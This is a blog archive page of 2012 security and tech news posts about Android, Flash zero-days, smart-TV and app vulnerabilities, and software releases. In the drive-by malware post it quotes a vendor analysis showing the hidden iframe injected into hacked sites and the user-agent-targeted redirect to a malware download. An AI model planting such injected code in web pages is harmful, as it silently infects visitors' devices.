Showing posts sorted by date for query Android. Sort by relevance Show all posts
Showing posts sorted by date for query Android. Sort by relevance Show all posts

Adobe Plugged Newly Found Zero-day Hole In Flash Player

Adobe Plugged Newly Found Zero-day Hole In Flash Player

Adobe warned that hackers are exploiting a critical vulnerability in its popular Flash Player program, and issued an emergency update to patch the bug. The vulnerability allows an attacker to crash the player or take control of an affected system. Adobe says that there are reports of this vulnerability being exploited in the wild as part of targeted email-based attacks which trick the user into clicking on a malicious file. Adobe released security updates for Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux, Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x. These updates address an object confusion vulnerability (CVE-2012-0779) that could cause the application to crash and potentially allow an attacker to take control of the affected system.
There are reports that the vulnerability is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious file delivered in an email message. The exploit targets Flash Player on Internet Explorer for Windows only. 
Affected Software Version :- 
  • Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux operating systems
  • Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x
Adobe recommends users of Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux update to Adobe Flash Player 11.2.202.235. Flash Player installed with Google Chrome was updated automatically, so no user action is required. Users of Adobe Flash Player 11.1.115.7 and earlier versions on Android 4.x devices should update to Adobe Flash Player 11.1.115.8. Users of Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and earlier versions should update to Flash Player 11.1.111.9. For detailed information and to see the security bulletin of Adobe click here.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system. The style of attack is known as a drive-by download and is common on the desktop: When someone visits a hacked website, malware can transparently infect the computer if it doesn't have up-to-date patches. The malware, dubbed NotCompatible by Lookout Security and initially reported by Reddit user Georgiabiker, is hosted in a iframe at the bottom of a manipulated web page. When a user arrives on the page, a file by the name of "Update.apk" begins downloading immediately. According to Lookout Mobile Security official blog post- 
How it Works :- 
In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.
When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.
Technical Details :- 
Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it. For detailed information click here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LibreOffice 3.5.3 Final Arrives, 60+ Bugs Have Been Fixed

LibreOffice 3.5.3 Final Arrives, 60+ Bugs Have Been Fixed 

The Document Foundation announces LibreOffice 3.5.3, the fourth version of the 3.5 family. LibreOffice 3.5.3 provides additional stability to corporate and individual users of the best free office suite ever. As expected, the new stable release adds no new features, instead fixing more than 60 bugs found in the core of the program. These include problems when importing PDF, PPTX, RTF and DOCX files, as well as a crashing bug.
Highlighted Features:-
  • Calc performance improvements
  • Lightproof improvements
  • Collaborative spreadsheet editing using Telepathy
  • A Microsoft Publisher import filter
  • A signed PDF export
  • A smartphone remote control
  • A new UI for picking templates
  • A Java based GUI for an Android viewer
  • An improved Impress SVG export filter
  • Tooling for more and better tests
The distribution for Windows is an international build, so you can choose the user interface language that you prefer. Help content is available via an online service, or alternatively as a separate install. For Windows users that have LibreOffice prior to version 3.4.5 installed, either uninstall that beforehand, or upgrade to 3.4.5. Otherwise, the upgrade to 3.5.2 may fail. LibreOffice contains all the security fixes from OpenOffice.org in 3.3.0, and perhaps more as a side-effect of the code clean-ups. Microsoft Office 2010 will complain that ODF 1.2 and extended documents written by LibreOffice 3.5 are invalid (but opens them still). This is a shortcoming in MSO2010 only supporting ODF 1.1, please see here for further details. 

To Download LibreOffice Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Samsung TV & BD Systems are Vulnerable to DoS & Remote Administration

Samsung TV & BD Systems are Vulnerable to DoS & Remote Administration 

The most recent bug, found in a wide range of high-definition TVs from Samsung, was disclosed on Thursday. Luigi Auriemma an Italy-based researcher who regularly finds security flaws in Microsoft Windows, video games, and so on. While poking around a Samsung D6000 model belonging to his brother, he inadvertently discovered a way to remotely send the TV into an endless restart mode that persists even after unplugging the device and turning it back on.
Vulnerability Description:-
All the current Samsung TV and BD systems can be controlled remotely via iPad, Android and other software/devices supporting the protocol used on TCP port 55000
The vulnerabilities require only the Ethernet/wi-fi network connected to be exploited so anyone with access to that network can do it. I have not tested if there are limitations on Internet or in big WANs. The remote controller feature is enabled by default like all the other services (over 40 TCP ports opened on the TV).
Bugs
When the controller packet is received on the device it displays a message on the screen for telling the user that a new "remote" device has been found and he must select "allow" or "deny" to continue. The message includes also the name and MAC address specified in the received packet, they are just normal strings (there is even a field containing the IP address for unknown reasons). For additional information click here
"It wasn't even planned," Auriemma told Ars, referring to the most damaging of his two attacks, which rendered the device useless for three days, until he finally found a way to restore it to normal operation. "I wanted only to show a message on the TV when my brother was watching it. He selected the 'deny' choice and boom."

The TV was connected by ethernet cable to a home network, so Auriemma thought it would be funny to use a computer connected to the same network to send it a message that contained a series of custom headers. Without warning, the TV spiraled into an endless loop of restarts. For about five seconds, the device would appear to work correctly, but then would stop responding to commands entered by remote control or through the panel. A few seconds later, the TV would restart and repeat the process. Unplugging the power cord or ethernet cable did nothing. Auriemma had just stumbled upon a crippling denial-of-service attack.

Auriemma said he sees no reason the attack couldn't be carried out over the Internet if the TV had a public IP address and used no filters. His discovery came two weeks after a separate researcher reported a DoS vulnerability in Sony Bravia TVs. Using the publicly available hping networking tool, Gabriel Menezes Nunes said he was able to seriously disrupt its operation.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Malicious Android Application Stealing User Data & Personal Information

Malicious Android Application Stealing User Data & Personal Information 

Yet again security vulnerability found in Android application. An information security company has warned about malicious Android smartphone applications that steal and transmit personal data, such as contact information stored in users' address books. The company said these types of free applications have been downloaded up to 270,000 times, indicating that potentially millions of people have had their personal information stolen. An Internet security expert said, "It's possible that creating applications that transmits users' information without consent can be considered a crime under the Penal Code, which criminalises the creation of computer viruses." The malicious application only has three buttons: Steal SD Card Contents, Steal App Data, and Upload Identifying Data.Every application has at least read-only access to the contents of this external storage. No Permissions scans the /sdcard directory and returns a list of all non-hidden files. All the files discovered can be fetched. The worrying part is that the SD card usually stores some of our most private files, including photos, backups, external configuration files, and, in some cases, even Open VPN certificates.
According to NetAgent, a Tokyo-based information security company, the applications were disguised as video tutorials for popular games on Google Inc.'s Android operating system. The applications were named by affixing the expression "the Movie" to existing game titles. The company found at least 16 of these applications.
The company's analysis revealed that when these applications are activated, they can automatically transmit not only a person's telephone number, their e-mail address and the phone's ID number, but also the personal names, telephone numbers and e-mail addresses of contacts stored on the smartphone's address book. Although the creators of these applications aren't well known, the stolen information was sent to the same domestic server. When users download the malicious applications, a message pops up on the display screen requesting permission for access to contact information. What ever the malicious application was immediately deleted from Android market. For additional information click here.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Facebook Application For iOS & Android Have Security-Hole Which Allows Identity Theft

Facebook Application For iOS & Android Have Security Hole Which Allows Identity Theft 
Facebook users again under risk.  Recently a new security vulnerability found in Facbook application for iOS & Facebook application for Android. Researcher app developer Gareth Wright, who discovered the issue, said it comes down to Facebook’s native apps for the two platforms not encrypting your login credentials, meaning they can be easily swiped over a USB connection, or more likely, via malicious apps. Facebook has responded that this issue only applies to compromised or jailbroken devices. Means if you are using a jailbroken iOS device or a rooted Android device then your identity can easily be theft. Wright copied the hash and tested a few FQL queries. "Sure enough, I could pull back pretty much any information from my Facebook account. As of the 1st of May 2012 these tokens run out after 60 days but aside from that a simple .Net tool could easily snaffle this info and grab a fair whack of confirmed email addresses and marketing info.
“Not good, but then I had to wonder what the Facebook app stored. Popping into the Facebook application directory I quickly discovered a whole bunch of cached images and the com.Facebook.plist. “What was contained within was shocking. Not an access token but full oAuth key and secret in plain text. Surely though, these are encrypted or salted with the device ID. Worryingly, the expiry in the plist is set to 1 Jan 4001!" 
“Facebook’s iOS and Android applications are only intended for use with the manufacture provided operating system, and access tokens are only vulnerable if they have modified their mobile OS (i.e. jailbroken iOS or modded Android) or have granted a malicious actor access to the physical device,” a Facebook spokesperson said in a statement. “We develop and test our application on an unmodified version of mobile operating systems and rely on the native protections as a foundation for development, deployment and security, all of which is compromised on a jailbroken device. As Apple states, ‘unauthorized modification of iOS could allow hackers to steal personal information … or introduce malware or viruses.’ To protect themselves we recommend all users abstain from modifying their mobile OS to prevent any application instability or security issues.”
As for the USB connection scenario, Facebook says there’s no way to fix this problem. Note that in this case it doesn’t matter if your device is jailbroken or not, because whoever is doing the deed has physical access to your phone or tablet.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

BlackBerry Mobile Fusion -The evolution of Enterprise Mobility (Also Supports iOS & Android)

BlackBerry Mobile Fusion - The evolution of Enterprise Mobility (Also Supports iOS & Android)

Researcher at BlackBerry has officially launched BlackBerry Mobile Fusion, its next-generation mobile device management (MDM) solution for enterprise customers that extends support to other mobile operating systems such as iOS and Android. RIM says the new technology delivers a cost-efficient, secure, reliable and scalable solution with a unified web-based console for easily managing devices. "BlackBerry Mobile Fusion helps make managing mobile devices faster, easier and more organized than ever. From a unified interface, manage BlackBerry smartphones1, BlackBerry PlayBook tablets and devices that use Apple iOS2 and Google Android3 operating systems." -Said BlackBerry
Key Features:-
  • Manage devices, users, groups and policies from a single place
  • Manage required and optional work applications
  • Supports BlackBerry Balance technology for BlackBerry devices
  • Manage and secure BlackBerry PlayBook tablets
  • Support for devices that use Apple iOS and Google Android operating systems
  • Security designed for everyone

For additional information about BlackBerry Mobile Fusion click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

DuckDuckGo Trying To Beat Google With Simplicity & Strict Privacy Protections Features

DuckDuckGo Trying To Beat Google With Simplicity & Strict Privacy Protections Features 

Nowadays Google is facing massive criticism  for changes Google made in the way it displays search results, putting content from Google’s social network, Google Plus, up front and center, even when it doesn’t seem to make sense. Add to that concerns from users and regulators over Google’s new privacy policy, and Google search has had a difficult 2012 so far, to say the least. In contrast, the fortunes of a relatively unknown search engine focused on privacy, called DuckDuckGo, have never been better. DuckDuckGo, which promotes its simplicity and strict privacy protections over competitors, has experienced a record surge in traffic over the past three months, up 227 percent to nearly 1.5 million unique searches daily. DuckDuckGo’s founder Gabriel Weinberg said that he knew the tide was turning when his four-year-old search engine saw a million searches per day on February 14. In terms of U.S. search market, DuckDuckGo only accounts for an estimated 0.1 percent of all search traffic, according to results from tracking firm comScore. But it’s worth pointing out that fully half of DuckDuckGo’s traffic comes from overseas, mostly Europe, according to Weinberg. Another big change coming: DuckDuckGo plans to launch redesigned mobile apps for iOS (iPhone/iPad) and Android devices within the next 5 months. DuckDuckGo was launched in 2008, when Google’s stranglehold on the global search was reaching its current plateau.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Linux Kernel 3.3 Released With Android Merge, New File Systems & More Security

Linux Kernel 3.3 Released With Android Merge, New File Systems & More Security

After a few of rc release, finally Linus Torvalds has released Linux Kernel 3.3. According to the release note by Torvaldas - " Things did indeed calm down during the last week, and the shortlog looks pretty boring. The diffstat from -rc7 is dominated by the arch/tile defconfig changes, the rest is pretty small, although there are changes spread out in various subsystem s(drivers, filesystem, networking, perf tools)."
Summary:- This release features as the most important change the merge of kernel 
code from the Android project. But there is more, it also includes support for a new 
architecture (TI C6X), much improved balancing and the ability to restripe between 
different RAID profiles in Btrfs, and several network improvements: a virtual switch
implementation (Open vSwitch) designed for virtualization scenarios, a faster and 
more scalable alternative to the "bonding" driver, a configurable limit to the 
transmission queue of the network devices to fight bufferbloat, a network priority 
control group and per-cgroup TCP buffer limits. There are also many small 
features and new drivers and fixes are also available. 
 
Prominent Features in Linux 3.3:-
  • Android merge
  • Btrfs: restriping between different RAID levels, improved balancing, improved debugging tools
  • Open vSwitch
  • Bufferbloat fighting: Byte queue limits
  • Per-cgroup TCP buffer limits
  • Network priority control group
  • Better ext4 online resizing
  • New architecture: TI C6X
  • EFI boot support
  • Driver and architecture-specific change
  • Memory Management
  • Virtualization
  • Crypto
  • Security
  • Tracing/profiling
     
     
    For more information click here & to Download  Linux Kernel 3.3  
    Click Here
    
    
    
    

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Graphics Firm NVIDIA Joins The Linux Foundation

Graphics Firm NVIDIA Joins The Linux Foundation

The Linux Foundation has announced that amongst its latest addition of new members is graphics firm, NVIDIA, a move which is expected to strengthen the company's relationship within the Linux community. It has been hoped that from this membership, NVIDIA may partake in open-source driver projects, as currently NVIDIA only offers closed-source drivers for Linux, which typically adds complexity to integration and prevents the open-source community from efficiently contributing enhancements and bug-fixes.
On the other-hand, at the most basic level, NVIDIA may simply wish to reap the benefits of membership to support its increasing involvement in Linux-based operating systems such as Google Android, with the firm no doubt interested in the multimedia direction that Ubuntu appears to be heading in. In a brief statement, Nvidia said that its membership in the Linux Foundation will enable it to collaborate better with "the organizations and individuals instrumental in shaping the future of Linux, enabling a great experience for users and developers of Linux."



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

HTC Is Going To Release First Windows Phone 7 Handset (HTC Kaixuan) For China

HTC Is Going To Release  First Windows Phone 7 Handset (HTC Kaixuan) For China

Finally the Microsoft Mobile OS reached the key market of China. Taiwanese smart phone maker HTC has planed to release what could be the first Windows Phone 7 handset for mainland China. The HTC Kaixuan (triumphant return) will be launched later this month, the company said in a statement on Tuesday. HTC is already accepting pre-orders for the device on its online store in China for 4,399 yuan (US$698). Microsoft had said it expected its Windows Phone 7 mobile OS to launch in China during the first half of this year. Handset makers Nokia and ZTE also plan to release Windows Phone 7 smartphones in 2012.
HTC, however, said the Kaixuan is different in that its Windows Phone 7.5 OS has been localized for Chinese users. For instance, the Kaixuan comes installed with Sina Weibo, China's version of Twitter. Windows Phone 7 is however coming to China at a time when Google's Android OS is dominant, with a 56 percent share of the market in 2011, according to research firm Canalys. Android's open source nature has been the big reason behind the success of the OS, said Canalys research director Nicole Peng. This has allowed Chinese companies and developers to build a strong ecosystem around Android, resulting in localized versions of the OS and apps specially built for average Chinese consumers, she added. To compete with Android, Microsoft will need to develop the same kind of ecosystem for its Windows Phone 7 OS, which it so far lacks in China. "For Windows Phone 7, the biggest problem is the system is not localized enough," Peng said.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Think Android: National Security Agency Disclosed Smartphone Strategy

Think Android: National Security Agency (NSA) Disclosed Smartphone Strategy
The National Security Agency has come up with a security design that currently depends on Google Android smartphones, though the NSA contends it doesn't want to be wedded to any particular smartphone operating system. But its current "Fishbowl" phones, as they are called, are beefed-up highly secured Motorola Android smartphones that use double-encryption for voice traffic and a unique routing scheme for 3G network traffic back to the NSA first for security purposes. This design makes them suitable for classified information sharing with other like smartphones, according to Margaret Salter, technical director at NSA's information assurance directorate, who spoke about the so-called "Fishbowl" project, which today focuses on voice use of smart phones.
"We wanted to use the commercial standards that are out there," said Margaret Salter, technical director in NSA's information assurance directorate. "We wanted plug and play — but that was hard." The NSA also wants interoperability in order not to be trapped in vendor ok-in, but this is turning out to be hard to achieve. Earlier in January 2012 NSA has released the first public release of the Security Enhanced (SE) Android Project, a program designed to find and plug security holes and risks in the Android flavor of Linux. SE Android is based on the NSA’s SELinux, first released in 2000.
The NSA looked at SSL VPN as a standard and left no stone unturned in exploring commercial SSL VPN for mobile, but found utter lack of interoperability across vendor products. Salter said NSA also was frustrated with the lack of interoperability in Unified Communications Systems (UCS) products, noting that buying one piece often meant buying several others, there being little evidence of multi-vendor interoperability. So with some frustration, NSA changed to go with an open-source Session Initiation Protocol (SIP) server for the present. NSA also switched its mobile security strategy toward IPSec VPN, where things looked better in terms of interoperability than SSL VPN, and selected the Secure Real-Time Transport Protocol for Voice App and Transport Layer Security (TLS) with keys. This all means "the voice call is doubly encrypted," Salter said. "There's VoIP encryption and IPsec encryption."


-Source (IT World)




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Android Vulnerability- Hacker Can Gains Complete Control Into Your SmartPhone

Android Vulnerability- Hacker Can Gains Complete Control Into Your SmartPhone  
 
Security experts have discovered a serious flaw in a component of the operating system of Google Inc’s widely used Android smartphone that they say hackers can exploit to gain control of the devices. Researchers at startup cyber security firm CrowdStrike said they have figured out how to use that bug to launch attacks and take control of some Android devices.
CrowdStrike, which will demonstrate its findings next week at a major computer security conference in San Francisco, said an attacker sends an email or text message that appears to be from a trusted source, like the user’s phone carrier. The message urges the recipient to click on a link, which if done infects the device. At that point, the hacker gains complete control of the phone, enabling him or her to eavesdrop on phone calls and monitor the location of the device, said Dmitri Alperovitch, chief technology officer and co-founder of CrowdStrike.
Google spokesman Jay Nancarrow declined comment on Crowdstrike’s claim. Alperovitch said the firm conducted the research to highlight how mobile devices are increasingly vulnerable to a type of attack widely carried out against PCs. In such instances, hackers find previously unknown vulnerabilities in software, then exploit those flaws with malicious software that is delivered via tainted links or attached documents. He said smartphone users need to prepare for this type of attack, which typically cannot be identified or thwarted by mobile device security software.
“With modifications and perhaps use of different exploits, this attack will work on every smartphone device and represents the biggest security threat on those devices,” said Alperovitch, who was vice president of threat research at McAfee Inc before he co-founded CrowdStrike.
Researchers at CrowdStrike were not the first to identify such a threat, though such warnings are less common than reports of malicious applications that make their way to online websites, such as Apple’s App Store or the Android Market.
In July 2009, researchers Charlie Miller and Collin Mulliner figured out a way to attack Apple’s iPhone by sending malicious code embedded in text messages that was invisible to the phone’s user. Apple repaired the bug in the software a few weeks after the pair warned it of the problem.
The method devised by CrowdStrike currently works on devices running Android 2.2, also known as Froyo. That version is installed on about 28 percent of all Android devices, according to a Google survey conducted over two weeks ending February 1. Alperovitch said he expects to have a second version of the software finished by next week that can attack phones running Android 2.3. That version, widely known as Gingerbread, is installed on another 59 percent of all Android devices, according to Google. CrowdStrike’s method of attack makes use of a previously unpublicized security flaw in a piece of software known as webkit, which is built into the Android operating system’s Web browser.


-Source (MyBoradband, Google, CrowdStrike)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Google Is Planning To Bring Android Operating System Onto The Desktop

Google Is Planning To Bring Android Operating System Onto The Desktop
Earlier in this week we have covered that Canonical has announced a new product called Ubuntu for Android that will bring the popular Linux distribution to high-end Android smart phones. Now in a move that's essentially a mirror image of Canonical's announcement, it appears Google is planning to bring its Android mobile operating system onto the desktop. “Android is headed for the desktop and today's report lays out Google's specific work on trackpad operations corresponding to touchscreen events,” wrote Patently Apple's Jack Purcher in a Wednesday special report Google and Intel are already collaborating on a project to adaptAndroid for x86 architectures and several other related efforts. Also, it has been observed that both the mobile and desktop computing worlds are gradually converging. Owing to this, operating systems are rapidly taking a multiscreen approach. One such instance has already been seen with Windows 8 and its Metro interface. 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Ubuntu for Android - A Full Ubuntu Desktop, On Your Docked Android Phone

Ubuntu for Android - A Full Ubuntu Desktop, On Your Docked Android Phone
We have a great news for both Ubuntu & Android lovers. Canonical has announced a new product called Ubuntu for Android that will bring the popular Linux distribution to high-end Android smartphones. The product consists of a complete Ubuntu desktop experience that is intended to be installed on the device alongside the standard Android environment. Users will be able to run Ubuntu from their phone when they plug the device into a dock that connects to a keyboard and monitor. The underlying concept is similar to that of the WebTop environment that Motorola ships on the Atrix handset and other devices.
The new Ubuntu variant runs on top of the Android kernel and is designed to work well on devices with dual-core ARM CPUs. Unlike Motorola's Ubuntu-based WebTop environment, Ubuntu for Android brings a much more complete desktop stack with a number of popular applications. It also provides more comprehensive integration with the Android environment on the user's phone. The default application stack includes the Chromium Web browser, the Thunderbird e-mail client, the Gwibber social networking program, the VLC video player, and a selection of other software. The environment includes a unified contact system that will make the user's Android address book fully accessible in the Ubuntu environment. It can also detect the social network accounts that the user has configured in Android and automatically enable them in Gwibber. Further details can be found Here


-Source (Ubuntu & Arstechnica)




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Zero-Day Vulnerability In Flash Patched By Adobe

Zero-Day Vulnerability In Flash Patched By Adobe 
Yet another Zero day vulnerability found in Adobe Flash Player. Earlier hackers found zero-day exploit in flash player which can allow an attacker to hack you web-cam remotely later Adobe patched that. Before releasing Flash Player 11 Adobe issued new privacy policy and security update but now it seems that those are of zero use. 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris, Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x. These vulnerabilities could cause a crash and potentially allow an attacker to take control of the affected system.
Affected Version:- 
  • Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
  • Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x

Later Adobe confirmed that and immediately released a patch to close the security hole. Through this security release Adobe also resolves a universal cross-site scripting vulnerability that could be used to take actions on a user's behalf on any website or webmail provider, if the user visits a malicious website. There are reports that this vulnerability (CVE-2012-0767) is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious link delivered in an email message (Internet Explorer on Windows only). Google's Chrome Web browser, which directly integrates Flash into its software (unlike competing browsers) also received an update to reflect Adobe's patch update. 
Recommendation From Adobe:-
Adobe recommends users of Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris update to Adobe Flash Player 11.1.102.62. Users of Adobe Flash Player 11.1.112.61 and earlier versions on Android 4.x devices should update to Adobe Flash Player 11.1.115.6. Users of Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and earlier versions should update to Flash Player 11.1.111.6. For further details click here.
Earlier in 2011 another Flash Player bug found in Blackberry OS & later fixed by the developer and also last year adobe closes serious security hole in Acrobat 9X & Adobe Reader.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

HTC Patched Wi-Fi Vulnerability In Its Android Phones


HTC Patched Wi-Fi Vulnerability In Its Android Phones 

Wi-Fi vulnerability in Android Phones of HTC has been pacthed. The company has provided a firmware update to fix a "small" security hole which allowed Wi-Fi credentials to be easily stolen. Both HTC and Google were informed of the problem last September. 
Chris Hessing and Bret Jordan, security architects at Open1X Said:-
"There is an issue in certain HTC builds of Android that can expose the user's 802.1X Wi-Fi credentials to any program with basic Wi-Fi permissions, When this is paired with the internet access permissions, which most applications have, an application could easily send all stored Wi-Fi network credentials (user names, passwords, and SSID information) to a remote server."
HTC said it had developed a fix for the issue. "Most phones have received this fix already through regular updates and upgrades. However, some phones will need to have the fix manually loaded."
Affected devices include the Desire HD, Glacier, Droid Incredible, Thunderbolt 4G, Sensation, Sensation 4G, Desire S, Evo 3D and Evo 4D. Despite the big time lapse between the discovery of the issue and HTC releasing a fix, Hessing and Jordan commended the two firms' handling of the problem.
"Google and HTC have been very responsive and good to work with on this issue. Google has made changes to the Android code to help better protect the credential store and HTC has released updates for all currently supported phones and side-loads for all non-supported phones," they said.

-Source (v3.uk & HTC)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Android Network Toolkit (Anti)- Penetration Testing From Smart Phone

Android Network Toolkit (Anti)- Penetration Testing From Smart Phone
Earlier security professionals used to carry their own gadgets, laptops, security tool kit to do VAPT but now the time has been changed. That time it was a hardest desire and that was if there is one small device that would help in fulfilling our evil purpose! Now your dream has come true. Android users are now gifted with one such toolkit. Anti: Android Network Toolkit is one such toolkit that has hit the android market and is quite useful for penetration testers on move and security freaks.  Using Anti is very intuitive on each run, it will map your network, scan for active devices and vulnerabilities, and will display the information accordingly: Green led signals an ‘Active device’, Yellow led signals “Available ports”, and Red led signals “Vulnerability found”. Also, each device will have an icon representing the type of the device. When finished scanning, Anti will produce an automatic report specifying which vulnerabilities you have or bad practices used, and how to fix each one of them. 

Anti Has 4 Plans:-
Basic – Free
Silver – $10
Gold – $50
Platinum – $250
Features of Anti:-
  • Scanning
  • OS Detection
  • Traceroute
  • Port Connect
  • WIFI Monitor
  • HTTP Server
  • Man-in-the-middle
  • Remote Exploits
  • Plugins
  • Support
 Video Demonstration:- 



For Additional Information & To Download ANTI Click Here


-Source (zim perium)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Twitter Hired Security Firm Dasient !!!

 Twitter Hired Security Firm Dasient
Web Security Firm Dasient has been acquired by twitter. The companies announced Monday that they have purchased anti-malware startup Dasient. This is not Twitter's first security-related acquisition. In November, the micro-blogging service purchased Whisper Systems, a mobile security startup & later twitter make Android Security open source. "By joining Twitter, Dasient will be able to apply its technology and team to the world's largest real-time information network," co-founder and CTO Neil Daswani, wrote in a blog post.Effective immediately, Dasient will become part of Twitter's "revenue engineering" team. As part of the agreement, Dasient will wind down its business and no longer accept new customers.

Brief About Dasient:- 
Dasient, founded in 2008 and based in Sunnyvale, Calif., offers solutions to protect against Web-based malware attacks. In 2009, Dasient launched a Web anti-malware platform used to scan URLs and Web sites for harmful content and prevent the sites from being blacklisted. The following year, the company launched a so-called anti-malvertising service to protect advertising networks from nefarious ads. The company's cloud security technology is used to defend Web sites belonging to banks, e-commerce retailers, and other enterprises. 


-News Source (PC Mag & Dasient)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

jQ.Mobi - A New Framework For Mobile Development Such As BlackBerry, Android & iOS

jQ.Mobi - A New Framework For Mobile Development Such As BlackBerry, Android & iOS

We have a good news for those who are very passionate about Mobile development. Today we will discuss about Java Query Written Mobi (JQ.Mobi) which is a new JavaScript framework for mobile applications. According to its developers, the framework is 2.5 times faster than the desktop variant of the jQuery JavaScript library, some of whose APIs are used by jQ.Mobi, and it only uses about 3 KByte of memory. jQ.Mobi, currently in beta, is intended for use in developing apps for systems with a WebKit browser, such as Android, iOS and the more recent versions of RIM's BlackBerry OS. The framework consists of a query selector engine, a UI library and several plug-ins.


Further detailed information about JQ.Mobi can be found on their official Project Page & Blog



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...